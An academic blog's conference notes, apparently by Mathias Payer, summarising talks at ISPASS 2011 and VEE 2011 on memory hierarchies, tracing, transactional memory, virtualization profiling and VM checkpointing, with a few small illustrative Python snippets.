&lt;p&gt;&lt;strong&gt;A Semi-Preemptive Garbage Collector for Solid State Drives&lt;/strong&gt;
&lt;em&gt;(Junghee Lee*, Youngjae Kim, Galen M. Shipman, Sarp Oral, Jongman
Kim*, Feiyi Wang, Oak Ridge National Laboratory, Georgia Institute of
Technology*)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Block replacement strategies and how to cope with flash problems:
implement a semi-preemptive form of GC for flash blocks inside the SSD.
SSDs offer fast access speeds but suffer performance degradation due to
garbage collection.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PRISM: Zooming in Persistent RAM Storage Behavior&lt;/strong&gt;
&lt;em&gt;(Ju-Young Jung, Sangyeun Cho, University of Pittsburgh)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Block-oriented FS for PRAM. Not my field.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Evaluation and Optimization of Multicore Performance Bottlenecks in
Supercomputing Applications&lt;/strong&gt;
&lt;em&gt;(Jeff Diamond, Martin Burtscher, John D. McCalpin, Byoung-Do Kim,
Stephen W. Keckler, James C. Browne, University of Texas Austin, Texas
State University, and NVIDIA)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Moore's law of supercomputing: scale the number of cores! Motivation
for this paper: inter-chip scalability. New compiler optimizations for
multi-core CPUs, depending on cache layout and coordination. Use AMD
performance counters to measure HPC performance.&lt;/p&gt;
&lt;p&gt;The most important performance factors for multi-core are: L3 miss rates
(cache contention), off-chip bandwidth, and DRAM contention (DRAM page
miss rates). (Great talk!)&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-2-memory-hierarchies-suzanne-rivoire-sonoma-state-university"&gt;
&lt;h2&gt;Session 2: Memory Hierarchies (Suzanne Rivoire, Sonoma State University)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Minimizing Interference through Application Mapping in Multi-Level
Buffer Caches&lt;/strong&gt;
&lt;em&gt;(Christina M. Patrick, Nicholas Voshell, Mahmut Kandemir, Pennsylvania
State University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Storage paper that handles a switched network with a complicated node
hierarchy. The paper introduces interference predictors for the I/O
route through the network and analyzes buffer cache placement.
-ETOOMANYFORMULAS (for me)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Analyzing the Impact of Useless Write-Backs on the Endurance and
Energy Consumption of PCM Main Memory&lt;/strong&gt;
&lt;em&gt;(Santiago Bock, Bruce R. Childers, Rami G. Melhem, Daniel Mosse, Youtao
Zhang, University of Pittsburgh)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;20-40% of energy consumption is due to the memory system. Use phase-change
memory (PCM) instead of DRAM: low static power (non-volatile), read
performance comparable to DRAM, scales better than DRAM, but high energy
cost for writes and limited write endurance. Observation: a write-back is
useless if the data is not used again later on. Use application information
from the allocator, control-flow analysis, or the stack pointer. Focus: how
many useless write-backs can be avoided using these metrics? 3 different
regions analyzed: heap: use malloc/free; global: control-flow
analysis; stack: stack pointer.&lt;/p&gt;
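&lt;p&gt;The dead-region idea can be sketched as follows (my own toy illustration, not the paper's implementation; the names and numbers are made up):&lt;/p&gt;

```python
# Toy sketch (not the paper's exact mechanism): a write-back is "useless"
# when the dirty line's address falls in a region the application has
# already declared dead (freed heap, popped stack).
def useless_writebacks(writeback_addrs, dead_ranges):
    def dead(addr):
        return any(addr in range(lo, hi) for lo, hi in dead_ranges)
    return sum(1 for addr in writeback_addrs if dead(addr))

# Lines at 0x2400 and 0x2f80 sit in freed memory: those write-backs can
# be dropped, saving PCM write energy and endurance.
assert useless_writebacks([0x1000, 0x2400, 0x2f80], [(0x2000, 0x3000)]) == 2
```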
&lt;p&gt;What about DRAM, would that make sense as well? (Reducing the number of
write-backs), e.g. for cache coherency in multi-cores?
His solution: application tells the HW which regions are dead / alive.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Access Pattern-Aware DRAM Performance Model for Multi-Core Systems&lt;/strong&gt;
&lt;em&gt;(Hyojin Choi, Jongbok Lee*, Wonyong Sung, Seoul National University,
Hansung University*)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Latency between different banks, very low level/HW.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Characterizing Multi-threaded Applications based on Shared-Resource
Contention&lt;/strong&gt;
&lt;em&gt;(Tanima Dey, Wei Wang, Jack Davidson, Mary Lou Soffa, University of
Virginia)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Check/measure intra-application contention and inter-application
contention for L1/L2/Front side bus.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-3-tracing-tom-wenisch-university-of-michigan"&gt;
&lt;h2&gt;Session 3: Tracing (Tom Wenisch, University of Michigan)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Trace-driven Simulation of Multithreaded Applications&lt;/strong&gt;
&lt;em&gt;(Alejandro Rico*, Alejandro Duran*, Felipe Cabarcas*, Alex Ramirez,
Yoav Etsion*, Mateo Valero*, Barcelona Supercomputing center*,
Universitat Politecnica de Catalunya)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How to simulate multi-threaded applications using traces? Capture traces
for sequential code sections, capture calls to parops but do not capture
the execution of parops. Interesting but not my topic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Efficient Memory Tracing by Program Skeletonization&lt;/strong&gt;
&lt;em&gt;(Alain Ketterlin, Philippe Clauss, Universite de Strasbourg &amp;amp; INRIA)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We want the minimum amount of code needed to reproduce the memory access
behavior of an application. Full instrumentation is expensive but useful as
a baseline. To improve from there we need to find loops in binary code,
try to recognize patterns, and generate the access sequences directly to
remove instrumentation. Work on machine code and find memory accesses such
as movl %eax, (%ebx,%ecx,8).&lt;/p&gt;
&lt;p&gt;Program skeletonization extracts what is useful to compute the memory
addresses.&lt;/p&gt;
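&lt;p&gt;The idea can be illustrated with a hypothetical sketch of my own (names and numbers invented): once a loop's accesses are recognized as affine, the skeleton regenerates the trace instead of instrumenting every access.&lt;/p&gt;

```python
# Hypothetical illustration: a loop access recognized as the affine
# pattern addr = base + stride * i can be replayed without per-access
# instrumentation.
def replay_affine(base, stride, n):
    return [base + stride * i for i in range(n)]

# What full instrumentation of movl %eax, (%ebx,%ecx,8) would record for
# a 100-iteration loop starting at base 0x1000:
full_trace = [0x1000 + 8 * i for i in range(100)]
assert replay_affine(0x1000, 8, 100) == full_trace
```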
&lt;p&gt;Do you also track direct registers (e.g., the address computation
happens before)? You decouple the memory recording and the application,
so recording happens with loose correlation to the application. How do
you handle threads/concurrent memory accesses? Exceptions? (Great talk!)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Portable Trace Compression through Instruction Interpretation&lt;/strong&gt;
&lt;em&gt;(Svilen Kanev, Robert Cohn*, Harvard University, Intel*)&lt;/em&gt;
If you are reliably able to predict a byte stream, you do not need to
record it.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="reception-poster-session"&gt;
&lt;h2&gt;Reception &amp;amp; Poster Session&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;VMAD: A Virtual Machine for Advanced Dynamic Analysis of Programs&lt;/strong&gt;
&lt;em&gt;(Alexandra Jimborean, Matthieu Hermann*, Vincent Loechner, Philippe
Claus, INRIA, Universite Strasbourg*)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Interesting work on LLVM that adds different alternatives and tries
reverse compilation to turn, e.g., while loops into for loops and
adaptively optimize them (for C/C++ code). Interesting work; maybe
forward her Oliver's work.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance Characterization of Mobile-Class Nodes: Why Fewer Bits is
Better&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(Michelle McDaniel, Kim Hazelwood, University of Virginia)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For netbooks, 32-bit code is faster than 64-bit code. What kind of GCC
settings did you use? Mention Acovea; also, her master's thesis is about
padding, give her a pointer to my work.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="keynote-ii-integrated-modeling-challenges-in-extreme-scale-computing"&gt;
&lt;h2&gt;Keynote II:&amp;nbsp;Integrated Modeling Challenges in Extreme-Scale Computing&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;(Pradip Bose, IBM)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Exa-scale computing is 10^18 FLOPS, which is 1000x peta-scale computing.
What is the wall: power or reliability?&lt;/p&gt;
&lt;p&gt;Power wall: we need to reduce the power used by chips, with dozens of
cores per chip that are each allowed to use 1/1000 of the power. Idea:
different processing modes; storage mode: turn off parallel cores,
computing mode: turn off storage controllers and I/O. Reliability wall:
MTTF and reliability drop with the increased number of transistors.
Problem: with millions of cores/CPUs the MTTF is so low that supercomputers
are not even able to complete Linpack benchmarks between failures. MTTR vs.
MTTF (mean time to repair vs. mean time to failure).&lt;/p&gt;
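&lt;p&gt;A back-of-the-envelope sketch of why this happens (my numbers, not from the keynote): with independent, exponentially distributed node failures, system MTTF is roughly the per-node MTTF divided by the node count.&lt;/p&gt;

```python
# Assuming independent, exponentially distributed node failures, the
# first failure in the system arrives node_count times faster than on
# one node, so system MTTF is about node MTTF / node count.
def system_mttf_hours(node_mttf_hours, node_count):
    return node_mttf_hours / node_count

# A very reliable node (about 5.7 years MTTF) still yields a
# million-node machine that fails every 3 minutes on average.
assert system_mttf_hours(50_000.0, 1_000_000) == 0.05
```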
&lt;/div&gt;
&lt;div class="section" id="session-4-emerging-workloads-derek-chiou-ut-austin"&gt;
&lt;h2&gt;Session 4: Emerging Workloads (Derek Chiou, UT Austin)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Where is the Data? Why you Cannot Debate CPU vs. GPU Performance
Without the Answer&lt;/strong&gt;
&lt;em&gt;(Chris Gregg, Kim Hazelwood, University of Virginia)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;GPU computation is fast but data transfer from/to the GPU is a
bottleneck. GPU speedup is misleading without describing the data
transfer necessities.&lt;/p&gt;
&lt;p&gt;Questions: What about algorithms with dual-use approach where the CPU
does not idle during kernel? What about compression? (Great talk!)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Accelerating Search and Recognition Workloads with SSE 4.2 String and
Text Processing Instructions&lt;/strong&gt;
&lt;em&gt;(Guangyu Shi, Min Li, Mikko Lipasti, UW-Madison)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;STTNI can be used to implement a broad set of search and recognition
applications; embrace the newly available instructions to speed up
classical algorithms. pcmpestri: packed compare explicit-length strings,
return index. The new instructions can be used for any data comparisons.
Depending on the data structure, different algorithms are needed: easy for
arrays; tree structures need some B-tree handling, similar to strings;
hash tables are more complicated, but collisions can be resolved with
STTNI.&lt;/p&gt;
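&lt;p&gt;As a rough mental model of the instruction, here is a pure-Python analogue (my sketch; the real intrinsic, _mm_cmpestri, supports several comparison modes and does this for a whole 16-byte chunk in one instruction):&lt;/p&gt;

```python
# Pure-Python analogue of pcmpestri in its "equal any" mode on one
# 16-byte chunk: return the index of the first haystack byte matching
# any needle byte, or 16 if there is no match.
def cmpestri_equal_any(needle, chunk):
    for i, byte in enumerate(chunk[:16]):
        if byte in needle:
            return i
    return 16

assert cmpestri_equal_any(b"aeiou", b"bcdfghjklmnpqrst") == 16  # no vowel
assert cmpestri_equal_any(b"aeiou", b"hello world 1234") == 1   # 'e' at 1
```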
&lt;p&gt;What about aligned loads or loop unrolling for this code? The example was
a single static loop that used unaligned loads (expensive) and no
manual loop unrolling. The speaker only compared to GCC, not ICC or other
compilers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A Comprehensive Analysis and Parallelization of an Image Retrieval
Algorithm&lt;/strong&gt;
&lt;em&gt;(Zhenman Fang, Weihua Zhang, Haibo Chen, Binyu Zang, Fudan University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You shall not use Comic, Sans Serif, Courier, and Serif fonts on one
slide!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance Evaluation of Adaptivity in Transactional Memory&lt;/strong&gt;
&lt;em&gt;(Mathias Payer, Thomas R. Gross, ETH Zurich)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;My talk. See:&amp;nbsp;&lt;a class="reference external" href="https://nebelwelt.net/publications/files/11ISPASS.pdf"&gt;https://nebelwelt.net/publications/files/11ISPASS.pdf&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Transactional memory (TM) is an attractive platform for parallel
programs, and several software transactional memory (STM) designs have
been presented. We explore and analyze several optimization
opportunities to adapt STM parameters to a running program.
This paper uses adaptSTM, a flexible STM library with a non-adaptive
baseline common to current fast STM libraries to evaluate different
performance options. The baseline is extended by an online evaluation
system that enables the measurement of key runtime parameters like read-
and write-locations, or commit- and abort-rate. The performance data is
used by a thread-local adaptation system to tune the STM configuration.
The system adapts different important parameters like write-set
hash-size, hash-function, and write strategy based on runtime statistics
on a per-thread basis.&lt;/p&gt;
&lt;p&gt;We discuss different self-adapting parameters, especially their
performance implications and the resulting trade-offs. Measurements show
that local per-thread adaptation outperforms global system-wide
adaptation. We position local adaptivity as an extension to existing
systems.&lt;/p&gt;
&lt;p&gt;Using the STAMP benchmarks, we compare adaptSTM to two other STM
libraries, TL2 and tinySTM. Comparing adaptSTM and the adaptation system
to TL2 results in an average speedup of 43% for 8 threads and 137% for
16 threads. adaptSTM offers performance that is competitive with tinySTM
for low-contention benchmarks; for high-contention benchmarks adaptSTM
outperforms tinySTM.&lt;/p&gt;
&lt;p&gt;Thread-local adaptation alone increases performance on average by 4.3%
for 16 threads, and up to 10% for individual benchmarks, compared to
adaptSTM without active adaptation.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-5-simulation-and-modeling-david-murrell-freescale"&gt;
&lt;h2&gt;Session 5: Simulation and Modeling (David Murrell, Freescale)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Scalable, accurate NoC simulation for the 1000-core era&lt;/strong&gt;
&lt;em&gt;(Mieszko Lis, Omer Khan, MIT)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Yet another cycle accurate instruction simulator.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A Single-Specification Principle for Functional-to-Timing Simulator
Interface Design&lt;/strong&gt;
&lt;em&gt;(David A. Penry, Brigham Young University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Designing simulators. Problem: depending on the level of information
that is needed, there is a huge performance difference between simulators.
Idea: define a high-level interface and automatically generate low-level
interfaces that offer faster simulation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WiLIS: Architectural Modeling of Wireless Systems&lt;/strong&gt;
&lt;em&gt;(Kermin Fleming, Man Cheuk Ng, Sam Gross, Arvind, MIT)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Simulator for wireless protocols implemented in hardware (FPGA) for
better/more accurate analysis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Detecting Race Conditions in Asynchronous DMA Operations with
Full-System Simulation&lt;/strong&gt;
&lt;em&gt;(Michael Kistler, Daniel Brokenshire IBM)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using heavy-weight simulation helps in finding DMA bugs for light cache
protocols like Cell that have no explicit cache management. This work
can also be used for the analysis of cache protocols. (Great talk!)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mechanistic-Empirical Processor Performance Modeling for Constructing
CPI Stacks on Real Hardware&lt;/strong&gt;
&lt;em&gt;(Stijn Eyerman, Kenneth Hoste, Lieven Eeckhout, Ghent University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Analyze different types of architectures and compare performance and
different HW features.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-6-power-and-reliability-bronis-de-supinski-llnl"&gt;
&lt;h2&gt;Session 6: Power and Reliability (Bronis de Supinski, LLNL)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Power Signature Analysis of the SPECpower_ssj2008 Benchmark&lt;/strong&gt;
&lt;em&gt;(Chung-Hsing Hsu, Stephen W. Poole, ORNL)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Use many available measurements and analyze the signatures to develop a
better predictor for different CPU models.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Analyzing Throughput of GPGPUs Exploiting Within-Die Core-to-Core
Frequency Variation&lt;/strong&gt;
&lt;em&gt;(Jung Seob Lee, Nam Sung Kim, University of Wisconsin, Madison)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Scaling of HW down to very small structures leads to new problems and
characteristics.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Universal Rules Guided Design Parameter Selection for Soft Error
Resilient Processors&lt;/strong&gt;
&lt;em&gt;(Lide Duan, Ying Zhang, Bin Li, Lu Peng, LSU)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Reduce soft errors in processors through an analysis of architectural
weaknesses.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A Dynamic Energy Management in Multi-Tier Data Centers&lt;/strong&gt;
&lt;em&gt;(Seung-Hwan Lim, Bikash Sharma, Byung Chul Tak, Chita R. Das, The
Pennsylvania State University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;How to save energy in data centers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="final-remarks"&gt;
&lt;h2&gt;Final remarks&lt;/h2&gt;
&lt;p&gt;Jeff Diamond won the best paper award, no other remarks.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="ieee"></category><category term="conference"></category><category term="ispass"></category><category term="adaptSTM"></category></entry><entry><title>VEE conference ramblings</title><link href="/blog/2011/0413-vee-conference-ramblings.html" rel="alternate"></link><published>2011-04-13T13:45:00-04:00</published><updated>2011-04-13T13:45:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-04-13:/blog/2011/0413-vee-conference-ramblings.html</id><summary type="html">&lt;p&gt;As you might know I've been to the &lt;a class="reference external" href="https://www.cs.technion.ac.il/~erez/vee11/VEE_2011/Home_Page.html"&gt;VEE'2011&lt;/a&gt; conference in Newport
Beach/LA in the last couple of days. If you are interested in more
information about the talks then you can read my notes below.&lt;/p&gt;
&lt;div class="section" id="conference-details"&gt;
&lt;h2&gt;Conference details:&lt;/h2&gt;
&lt;p&gt;In total there were 84 abstracts, 64 full submissions, and 20 …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;p&gt;As you might know I've been to the &lt;a class="reference external" href="https://www.cs.technion.ac.il/~erez/vee11/VEE_2011/Home_Page.html"&gt;VEE'2011&lt;/a&gt; conference in Newport
Beach/LA in the last couple of days. If you are interested in more
information about the talks then you can read my notes below.&lt;/p&gt;
&lt;div class="section" id="conference-details"&gt;
&lt;h2&gt;Conference details:&lt;/h2&gt;
&lt;p&gt;In total there were 84 abstracts, 64 full submissions, and 20 papers
selected for presentation.
Corporate sponsors are: VMWare, Intel, Google, Microsoft Research, IBM
Research.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="keynote"&gt;
&lt;h2&gt;Keynote:&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Virtualization in the Age of Heterogeneous Machines&lt;/strong&gt;
&lt;em&gt;(David F. Bacon, IBM Research, known for thin locks,
http://www.research.ibm.com/liquidmetal/ )&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Motivation:
It's the multicore era! But what about performance? Three different
models of computation exist; CPU: general purpose, GPU: wins at gflops/$
(raw power), FPGA: wins at gflops/$/watt. The drawback is that they are
heterogeneous. A possible solution is to virtualize these
heterogeneous systems.&lt;/p&gt;
&lt;p&gt;There were basically 2 original ideas in computer science, hashing and
indirection; all else is a combination of those. Virtualization falls into
the indirection category. There are two forms of virtualization, namely
system VMs: virtualize the environment (VMWare, QEMU - different machines),
and language VMs: virtualize the ISA (MAME, QEMU - different
architectures). The current VM model usually is the accelerator model:
send stuff from the CPU to the GPU/FPGA for computation, get a nice chunk
of data back.&lt;/p&gt;
&lt;p&gt;What is the solution to get over this heterogeneity? Use virtualization!
David introduces LIME, the Liquid Metal programming language, a single
language with multiple backends: CPU, GPU, WSP, &amp;amp; FPGA. This single
language compiles down to different architectures. The CPU backend must
compile any code; all other backends can decide not to compile a
piece of code; e.g., code that is not deeply pipelineable (with
increased latency) can be rejected by the GPU compiler. The approach for
FPGAs uses an artifact store that has solutions for common problems.
These artifacts are then stitched together to form the compiled program;
otherwise the compilation overhead would be way too large. LmVM, the Lime
Virtual Machine, is introduced as an implementation of the LIME
principle. Code originally starts on the CPU and evolves (or can be
forced to evolve) to other platforms.&lt;/p&gt;
&lt;p&gt;The programming approach is as follows:
Java is a subset of Lime. A programmer starts with a Java program and
extends it with different Lime features. Many new types are introduced
in Lime to adhere to the hardware peculiarities of the different
machines. [Insert long and lengthy discussion about language features
here].&lt;/p&gt;
&lt;p&gt;Performance is evaluated using the following scheme: write 4 benchmarks
and 4 different versions of each benchmark to compare the different
implementations. The baseline is a naive Java implementation. This baseline
is compared to a handwritten expert implementation and the automatic
Lime compilation.
Total manpower needed to develop this approach: 8 man-years.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-1-performance-monitoring"&gt;
&lt;h2&gt;Session 1: Performance Monitoring&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Performance Profiling of Virtual Machines&lt;/strong&gt;
&lt;em&gt;(Jiaqing Du, Nipun Sehrawat and Willy Zwaenepoel, EPFL Lausanne)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Performance counters incur only low overhead, a lot lower than binary
instrumentation. The drawback is that support for virtual machines is
missing. There are three different profiling modes: native profiling
(os&amp;lt;-&amp;gt;cpu), guest-wide (os&amp;lt;-&amp;gt;cpu, without the VMM, only the guest is profiled),
and system-wide (os&amp;lt;-&amp;gt;VMM&amp;lt;-&amp;gt;cpu, both the VMM and the guest are profiled).
They implement performance counters for para-virtualization (Xen), hardware
assistance (KVM), and binary translation (QEMU) for both guest-wide
profiling and system-wide profiling.&lt;/p&gt;
&lt;p&gt;A challenging problem for guest-wide profiling is that the context must
be saved across all context switches (e.g., client 1 to VMM, VMM to client
2). The overhead of the implemented approach is low, about 0.4% for the
additional counters in all cases. Native overhead in contrast is about
0.04%, so the additional VMM increases the overhead by 10x. An analysis
of the accuracy shows that the deviation increases for virtual machines
but is still very low for compute-intensive benchmarks. For
memory-intensive benchmarks QEMU has a much higher cache miss rate due to
the binary translation overhead.&lt;/p&gt;
&lt;p&gt;Questions: What about profiling across different VMs? (in the VMM?) Is
PEBS supported?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Perfctr-Xen: A Framework for Performance Counter Virtualization&lt;/strong&gt;
&lt;em&gt;(Ruslan Nikolaev and Godmar Back, Virginia Tech Blacksburg)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Perfctr-Xen is an implementation of performance counter virtualization
using the perfctr library in Xen. This removes the need for
architecture-specific code inside the Xen core to support PMUs. Two new
drivers had to be implemented (a Xen host perfctr driver and a Xen guest
perfctr driver), and the perfctr library needed to be changed as well.&lt;/p&gt;
&lt;p&gt;Questions: What kind of changes are needed in the user-space library,
and why is the Xen guest driver needed? Is PEBS supported? Ruslan did not
convince me with his answers to the questions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic Cache Contention Detection in Multi-threaded Applications&lt;/strong&gt;
&lt;em&gt;(Qin Zhao, David Koh, Syed Raza, Derek Bruening (Google), Weng-Fai Wong
and Saman Amarasinghe, MIT)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The motivation of this talk is to detect cache contention in
multi-threaded applications (e.g., false sharing between arrays across
multiple threads). Dynamic instrumentation is used to keep track of
individual memory locations using a bitmap and shadow memory. The
ownership bitmap for each cache line stores which of up to 32 threads
own that line. If a thread that accesses a cache line is not the single
owner then we have a potential data sharing problem. Combined with
performance counters this can detect cache contention. The implementation
is on top of Umbra which uses DynamoRIO.&lt;/p&gt;
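The per-cache-line ownership tracking can be sketched roughly like this (a toy model of my own, not the Umbra/DynamoRIO implementation; the 64-byte line size and the 32-thread limit follow the talk):

```python
CACHE_LINE = 64          # assumed cache-line size in bytes
ownership = {}           # cache-line index -> 32-bit ownership bitmap

def record_access(addr, tid, is_write):
    """Set the accessing thread's ownership bit for the touched cache line.
    A write to a line already owned by another thread is flagged as
    potential (false) sharing."""
    assert 0 <= tid < 32
    line = addr // CACHE_LINE
    bitmap = ownership.get(line, 0) | (1 << tid)
    ownership[line] = bitmap
    # bitmap & (bitmap - 1) is nonzero iff more than one owner bit is set
    return is_write and bitmap & (bitmap - 1) != 0
```

A real tool would clear the bitmap periodically and consult performance counters before reporting, but the single-owner test is the core idea.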
&lt;p&gt;Questions: What tool did you use for BT? How can you know that you
measure the real overhead and not some distortion through the
instrumentation interface?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-2-configuration"&gt;
&lt;h2&gt;Session 2: Configuration&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Rethink the Virtual Machine Template&lt;/strong&gt;
&lt;em&gt;(Kun Wang, Chengzhong Xu and Jia Rao)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The main objective is to reduce the startup overhead of system images
down to 1 second. The problem is that the overhead of VM creation is large:
cloning copies files, and other solutions are limited to the same
physical machine. The idea is to concentrate on the 'substrate' of the
virtual machine and keep only the smallest possible state (e.g.,
app/OS state). This small substrate can then easily be copied to other
machines and restored to full online VM images.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dolly: Virtualization-driven Database Provisioning for the Cloud&lt;/strong&gt;
&lt;em&gt;(Emmanuel Cecchet, Rahul Singh, Upendra Sharma and Prashant Shenoy,
UMASS CS)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Emmanuel used the tagline &amp;quot;Virtual Sex in the Cloud&amp;quot;. This work tries to
solve the problem of adding database replicas to balance the load on
database backends. The problem is that the VM cannot just be cloned; a
complete database backup and restore must be carried out so that the DBs
can be synced across different nodes. It is hard to replicate state and,
e.g., instantiate a consistent copy/replica of a database. When the
replica is finally ready it misses the updates that happened
during the process of generating the replica. The idea of this work is
to dynamically scale database backends in the cloud by generating new VM
clones and using DB restore in the background. Parameters are the snapshot
interval and the update frequency of the database, which in turn determine
the size of the replay log that must be recovered. The evaluation
contains a detailed analysis of different predictors of when to take
snapshots, what the replay overhead from the snapshot to the current
state is, and how much it would cost on Amazon EC2.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ReHype: Enabling VM Survival Across Hypervisor Failures (Highlight)&lt;/strong&gt;
&lt;em&gt;(Michael Le and Yuval Tamir, UCLA)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The VMM is a single point of failure for VMs (due to hardware faults or
faults in the virtualization software). Another problem is that system
reboots (of the host) are too slow. ReHype detects failures and pauses VMs
in place. The VMM is then micro-rebooted. Paused VMs are then integrated
into the new VMM instance and unpaused. The related work 'Otherworld'
reboots the Linux kernel after a failure and keeps processes (applications)
in memory. ReHype recovers a failed VMM while preserving the states of VMs.
Possible VMM failures are crash, hang, or silent (no crash/hang detected
but VMs fail). Crash: the VMM panic handler is executed; hang: the VMM
watchdog handler is executed. The system was evaluated using fault
injections into the VMM state.&lt;/p&gt;
&lt;p&gt;ReHype can only recover from software failures; the hardware is still the
same, so persistent HW failures are not tolerated. Logs are not kept to fix
the bugs later on. But in theory this system could also be used to upgrade
VMMs.&lt;/p&gt;
&lt;p&gt;Questions: What about the size of the system (LOC)?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-3-recovery"&gt;
&lt;h2&gt;Session 3: Recovery&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Fast and Space Efficient Virtual Machine Checkpointing&lt;/strong&gt;
&lt;em&gt;(Eunbyung Park, Bernhard Egger and Jaejin Lee, Seoul National University, South
Korea)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Checkpointing can be used for faster VM scaling, high availability, and
debugging/forensics. A checkpoint stores the volatile state of the VM. A
large part of the snapshot data does not need to be saved, e.g., the file
cache in the Linux kernel. The goal is to make checkpointing faster by
detecting these redundant pages and removing them from the snapshot. A
mapping between memory pages and disk blocks is added to the VMM. Problem:
how to detect dirty/written pages in memory? It is necessary to check the
shadow page-table of the guest. Result: 81% reduction in stored data and
74% reduction in checkpoint time for para-virtualized guests, 66%
reduction in data and 55% reduction in checkpoint time for
fully-virtualized guests.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fast Restore of Checkpointed Memory using Working Set Estimation
(Highlight)&lt;/strong&gt;
&lt;em&gt;(Irene Zhang, Yury Baskakov, Alex Garthwaite and Kenneth C. Barr,
VMWare)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The goal is to reduce the time to restore a checkpoint from disk. Current
schemes: (1) eager restore, which restores all pages to memory; (2) lazy
restore, which restores only the CPU/device state and restores memory in
the background. If the guest accesses pages that are not yet restored then
the VMM must stop the VM and restore that specific page (this can lead to
thrashing). How to measure restore performance? Time-to-responsiveness
measures the time until the VM is usable. How big is the share of the
restore process of the total time? (Mutator utilization, a metric from the
GC community that measures GC overhead.)&lt;/p&gt;
&lt;p&gt;New feature: working-set restore, which prefetches the current working
set to reduce VM performance degradation. The working set is estimated
using either access-bit scanning or memory tracing. The memory tracing runs
alongside the VM all the time (overhead around 0.002%) and keeps track
of the working set. When the checkpoint is restored, this set of
pages is restored first and the VM is started at the point the
checkpoint was taken, so all the pages will be accessed again. (Of
course no external I/O may be executed during the checkpointing.)
Questions: Do you do any linearization of the list of pages that need
to be restored? Is I/O allowed during lazy checkpointing? What about a
working-set predictor that peeks into the future?&lt;/p&gt;
